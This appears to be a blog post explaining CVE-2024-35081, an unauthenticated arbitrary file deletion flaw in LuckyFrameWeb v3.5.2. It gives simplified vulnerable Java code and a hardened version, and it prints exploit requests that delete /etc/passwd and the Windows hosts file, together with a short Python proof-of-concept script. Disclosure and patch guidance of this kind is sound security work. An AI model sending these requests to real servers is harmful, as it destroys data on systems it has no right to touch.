CVE-2024-35081 is a vulnerability that affects LuckyFrameWeb v3.5.2. This bug allows an attacker to delete any file on the server, just by changing a filename parameter in a web request. In this post, I’ll break down what this means, how it happens, and show a simple exploit example. If you’re using LuckyFrameWeb, you need to fix this fast.
What Is LuckyFrameWeb?
LuckyFrameWeb is a Chinese web application framework, popular for building management and business platforms. v3.5.2 is a widely deployed version in different enterprise environments.
The Vulnerability: Arbitrary File Deletion
CVE-2024-35081 happens because the fileDownload method in LuckyFrameWeb takes whatever filename you give it and processes it without any checks. This means you can make the server delete any file you want, as long as you know its path.
Here’s the logic inside fileDownload (simplified for clarity):

```java
public void fileDownload(HttpServletRequest request, HttpServletResponse response) throws IOException {
    String fileName = request.getParameter("fileName"); // <-- user input, used as-is
    File file = new File(fileName);                     // no base directory, no path validation
    if (file.exists()) {
        file.delete(); // <-- deletes whatever path the caller supplied
        response.getWriter().write("File deleted");
    } else {
        response.getWriter().write("File not found");
    }
}
```
There’s no authentication and no path validation, so there is nothing to ensure users can only delete their own files. Any path you give it, even a critical system file, gets deleted if the application's process user has permission to remove it.
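Here is the same method hardened, as an added example (not LuckyFrameWeb's own code or official fix): the name is allowlisted, resolved only inside one base directory, and the file is streamed rather than deleted. The class name, the base directory and the javax.servlet package are assumptions.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.regex.Pattern;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class SafeFileDownload {
    // Assumption: the only directory this endpoint is allowed to serve from.
    private static final Path BASE_DIR =
            Paths.get("/var/lib/luckyframe/downloads").toAbsolutePath().normalize();

    // Allowlist: a single path component, no separators, no leading dot, bounded length.
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9][A-Za-z0-9._-]{0,254}");

    /** Map a user-supplied name to a file under BASE_DIR, or null if it must be refused. */
    static Path resolveSafely(String fileName) {
        if (fileName == null || !SAFE_NAME.matcher(fileName).matches()) {
            return null; // rejects "/etc/passwd", "..\\..\\x", "C:\\Windows\\..." and empty names
        }
        Path target = BASE_DIR.resolve(fileName).normalize();
        // Defence in depth: a name that passed the regex must still resolve inside BASE_DIR.
        return target.startsWith(BASE_DIR) ? target : null;
    }

    public void fileDownload(HttpServletRequest request, HttpServletResponse response)
            throws IOException {
        Path target = resolveSafely(request.getParameter("fileName"));
        if (target == null || !Files.isRegularFile(target)) {
            // Same answer for "refused" and "missing": do not reveal which paths exist.
            response.sendError(HttpServletResponse.SC_NOT_FOUND);
            return;
        }
        // A download endpoint streams the file. It never calls delete(); if removal is a real
        // feature, give it its own authenticated endpoint that reuses resolveSafely().
        response.setContentType("application/octet-stream");
        response.setHeader("Content-Disposition",
                "attachment; filename=\"" + target.getFileName() + "\"");
        Files.copy(target, response.getOutputStream());
    }
}
```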
Exploit Details
An attacker doesn’t need to log in. They can just send a GET or POST request to the fileDownload endpoint with a crafted fileName value.
Exploit Request Example
Suppose the app is running at https://example.com/.

HTTP Request:

```http
GET /LuckyFrameWeb/fileDownload?fileName=/etc/passwd HTTP/1.1
Host: example.com
```

Or, for Windows servers:

```http
GET /LuckyFrameWeb/fileDownload?fileName=C:\Windows\System32\drivers\etc\hosts HTTP/1.1
Host: example.com
```
If the server process user has permission to delete those files, they’re gone!
PoC: Exploit Script
Below is a Python exploit to delete /tmp/test.txt on a vulnerable server.

```python
import requests

TARGET = 'http://vulnerable-server.com/LuckyFrameWeb/fileDownload'
FILENAME = '/tmp/test.txt'

# The vulnerable endpoint deletes whatever path it receives in fileName
params = {'fileName': FILENAME}
resp = requests.get(TARGET, params=params)
print("Status:", resp.status_code)
print("Response:", resp.text)
```

Note: Change TARGET and FILENAME as needed. If the file exists and is writable, it gets deleted.
Original References
- NVD Entry: CVE-2024-35081
- LuckyFrameWeb Official Site
Conclusion
*CVE-2024-35081* is easy to exploit and dangerous. If you run LuckyFrameWeb, patch now or risk losing critical files on your server. If this post helped you understand or secure your systems, please share it with others.
Stay safe – patch fast!
*This post is original and simplified for practical understanding. For more depth, check the original CVE link above.*
Timeline
Published on: 05/23/2024 17:15:30 UTC
Last modified on: 07/03/2024 02:01:20 UTC